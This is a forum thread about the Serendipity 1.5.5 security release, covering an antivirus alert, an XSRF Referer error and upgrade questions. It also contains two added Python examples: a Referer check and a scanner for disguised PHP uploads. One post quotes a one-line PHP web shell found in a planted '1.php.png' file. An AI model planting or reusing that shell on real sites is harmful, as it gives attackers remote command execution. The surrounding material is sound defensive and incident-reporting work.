Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Tue Dec 21, 2010 11:36 pm
by garvinhicking
Hi!

Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html

Regards,
Garvin

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Tue Dec 28, 2010 12:38 pm
by ellisse
Hi... I'm sorry, but I've found a virus named Obfuscated in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade to serendipity 1.5.5 after the virus elimination?
Thanks
e.

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Wed Dec 29, 2010 12:44 pm
by garvinhicking
Hi!

tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.

If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").

HTH,
Garvin

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Wed Dec 29, 2010 2:25 pm
by peacekeeper
Hi,
after I updated S9Y to version 1.5.5 I cannot create new entries. I have got the following error alert: "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."

I updated 3 of my blogs. It's the same problem on each blog. I tested it on Internet Explorer 8, Firefox and Chrome! Same problem! :-(

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Fri Dec 31, 2010 3:38 pm
by garvinhicking
Hi!

From which version did you upgrade? Did you change anything in your PHP installation and/or .htaccess?

The error usually only happens if the PHP sessions mismatch, or your browser does not submit a "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.

HTH,
Garvin
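The Referer-based XSRF guard Garvin describes can be illustrated with a small Python function. This is an added example, not Serendipity's own code: the function name `check_referer`, the header dictionary and the hostnames are assumptions chosen for the illustration. It shows the three outcomes the post mentions: no Referer header at all (browser or proxy strips it), a Referer whose host is not the host configured for the blog (logging in under a different domain name), and the normal case.

```python
from urllib.parse import urlparse


def check_referer(headers, configured_host):
    """Classify a state-changing request the way a Referer-based XSRF guard does.

    Returns "ok", "missing-referer" or "host-mismatch" (assumed result names).
    `headers` is a plain dict of request headers; `configured_host` is the host
    name the blog is configured to run under (the s9y "HTTP host" setting).
    """
    referer = headers.get("Referer")
    if not referer:
        # The guard cannot distinguish a privacy proxy from a forged request,
        # so a missing header is rejected outright.
        return "missing-referer"
    host = urlparse(referer).hostname
    # Compare the full host name, not a substring, so evil-blog.example.org
    # does not pass as blog.example.org.
    if host is None or host.lower() != configured_host.lower():
        return "host-mismatch"
    return "ok"


if __name__ == "__main__":
    # Constructed requests against a blog configured as blog.example.org.
    for hdrs in ({"Referer": "http://blog.example.org/serendipity_admin.php"},
                 {},
                 {"Referer": "http://www.example.org/serendipity_admin.php"}):
        print(hdrs, "->", check_referer(hdrs, "blog.example.org"))
```

The third case is the one the advice about the configured host name addresses: `www.example.org` and `blog.example.org` may serve the same blog, but the Referer carries whichever name the browser used, so it must match the configured one exactly. A Referer check also depends on the browser actually sending the header, which is why a stripping proxy produces the same error.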

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Sun Jan 02, 2011 11:45 pm
by bryzo
I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Mon Jan 03, 2011 2:13 am
by Don Chambers
The lite version should also be the upgraded version.

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Fri Jan 14, 2011 8:32 pm
by Maccsta
I haven't updated some of my blogs for years! Better do this one then!

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Tue Jan 25, 2011 2:17 pm
by david@mediacopy
I've just installed the new version. While checking I found a file called

1.php.png

containing the line <?PHP system($_GET['cmd']); ?>

Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg
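The find above (a file with an image extension that is really a PHP script, plus log entries probing for similar names) is a typical post-compromise check an administrator can automate. The following Python script is an added example and not part of the thread or of Serendipity: it walks an upload directory looking for image-named files that have a double extension, do not start with the magic bytes of their claimed format, or contain a PHP open tag, and it scans combined-format access log lines for requests to `*.php.jpg`-style names. The directory layout, file names, log lines and function names (`scan_upload_dir`, `suspicious_requests`, `build_sample_dir`) are all constructed for the illustration; the sample "shell" file contains only a harmless marker, not the line quoted above.

```python
import re
import tempfile
from pathlib import Path

# Magic bytes a genuine image of each extension must start with.
IMAGE_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# A PHP open tag anywhere in the file body.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# Script extension followed by an image extension, e.g. 1.php.jpg.
DOUBLE_EXT = re.compile(r"\.php\.(?:jpe?g|png|gif)$", re.IGNORECASE)
# Leading fields of an Apache/nginx combined-format log line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_upload_dir(root):
    """Return findings for image-named files under `root` that are not images."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in IMAGE_MAGIC:
            continue
        head = path.read_bytes()[:4096]  # enough for magic bytes and a short script
        reasons = []
        if DOUBLE_EXT.search(path.name):
            reasons.append("double extension")
        if not head.startswith(IMAGE_MAGIC[path.suffix.lower()]):
            reasons.append("bad image magic")
        if PHP_OPEN_TAG.search(head):
            reasons.append("php open tag")
        if reasons:
            findings.append({"file": path.relative_to(root).as_posix(),
                             "reasons": reasons})
    return findings


def suspicious_requests(log_lines):
    """Return (ip, path, status) for requests to double-extension image names."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if DOUBLE_EXT.search(path):
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits


# Constructed log lines: two probes for the names mentioned in the post and
# one ordinary image request.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jan/2011:13:02:11 +0100] "GET /uploads/1.php.jpg HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Jan/2011:13:02:12 +0100] "GET /uploads/2.php.jpg HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Jan/2011:13:05:40 +0100] "GET /uploads/holiday.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
]


def build_sample_dir():
    """Create a constructed upload directory with two real images and two fakes."""
    root = Path(tempfile.mkdtemp(prefix="s9y-scan-"))
    uploads = root / "uploads"
    uploads.mkdir()
    (uploads / "holiday.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 32)
    (uploads / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    # Stand-in for the planted file: a PHP open tag with a harmless comment body.
    (uploads / "1.php.png").write_bytes(b"<?php /* constructed marker */ ?>")
    (uploads / "readme.gif").write_bytes(b"not an image at all")
    return root


if __name__ == "__main__":
    for finding in scan_upload_dir(build_sample_dir()):
        print(finding)
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The three checks are deliberately independent: a planted file renamed to a single image extension would escape the double-extension test but still fail the magic-byte test, and a script prepended with a real image header would pass the magic-byte test but still show the PHP open tag. Correlating the log hits with the file findings also tells you whether the probes found what they were looking for (a 200 rather than a 404), which is the first thing to establish in the clean-up.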

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Posted: Wed Feb 23, 2011 4:58 am
by VideoRob
Looks like I should update. I have over 50 blogs that I haven't updated in years.